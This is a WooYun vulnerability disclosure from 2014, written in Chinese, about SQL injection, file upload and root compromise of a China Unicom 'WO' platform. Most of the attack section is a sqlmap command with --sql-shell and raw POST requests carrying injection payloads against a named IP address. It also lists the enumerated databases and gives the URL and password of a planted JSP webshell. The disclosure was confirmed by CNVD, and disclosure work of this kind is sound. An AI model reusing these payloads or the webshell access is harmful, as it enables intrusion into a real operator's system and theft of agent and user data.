乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-04: 细节已通知厂商并且等待厂商处理中 2014-11-09: 厂商已经确认,细节仅向厂商公开 2014-11-19: 细节向核心白帽子及相关领域专家公开 2014-11-29: 细节向普通白帽子公开 2014-12-09: 细节向实习白帽子公开 2014-12-19: 细节向公众公开
中国联通某WO平台多个SQL+上传+shell+root数据库没仔细看,不知道有多大影响。有11个数据库,当前库有606张表,有十几个用户表,其中一张表用户全是各个代理商。拿到shell,root权限,没敢深入
先来sql:
sqlmap -r '/root/Desktop/3.1' --dbms=oracle --data="loginName=1&password1=g" --sql-shell
1,
POST /reg/modifyPasswordDo.html HTTP/1.1Content-Length: 157Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://211.95.193.67:80/Cookie: JSESSIONID=E90F0C9CAB7BC98173B17E8D702A2BBAHost: 211.95.193.67Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: */*loginName=1&password1=g&phoneCode=555-666-0606&phoneNo=555-666-0606
2,
POST /web/list.html HTTP/1.1Content-Length: 49Content-Type: application/x-www-form-urlencodedReferer: http://211.95.193.67:80/Cookie: JSESSIONID=E90F0C9CAB7BC98173B17E8D702A2BBAHost: 211.95.193.67Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: */*orderBy=code&pageNo=1&prices=1'%22&productTypeid=
3,
POST /reg/modifyPasswordDo.html HTTP/1.1Content-Length: 155Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://211.95.193.67:80/Cookie: JSESSIONID=E90F0C9CAB7BC98173B17E8D702A2BBAHost: 211.95.193.67Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0Accept: */*loginName=pplxundg&password=g00dPa%24%24w0rD&password1=g00dPa%24%24w0rD&phoneCode=555-666-0606&phoneNo=-1'%20OR%203*2*1%3d6%20AND%20000949%3d000949%20--%20
available databases [11]:[*] DBSNMP[*] EXFSYS[*] OUTLN[*] QDYX `[*] QDYX_YJ[*] QDYXTEST[*] SYS[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
上传
ROOT shell
http://211.95.193.67/files/head/20141103183718.jsp webshell 密码:jspspy
危害等级:高
漏洞Rank:16
确认时间:2014-11-09 09:15
CNVD确认并复现所述情况,已经转由CNCERT直接通报中国联通集团公司处置。按多个风险点并以及信息泄露风险评分,rank 16
暂无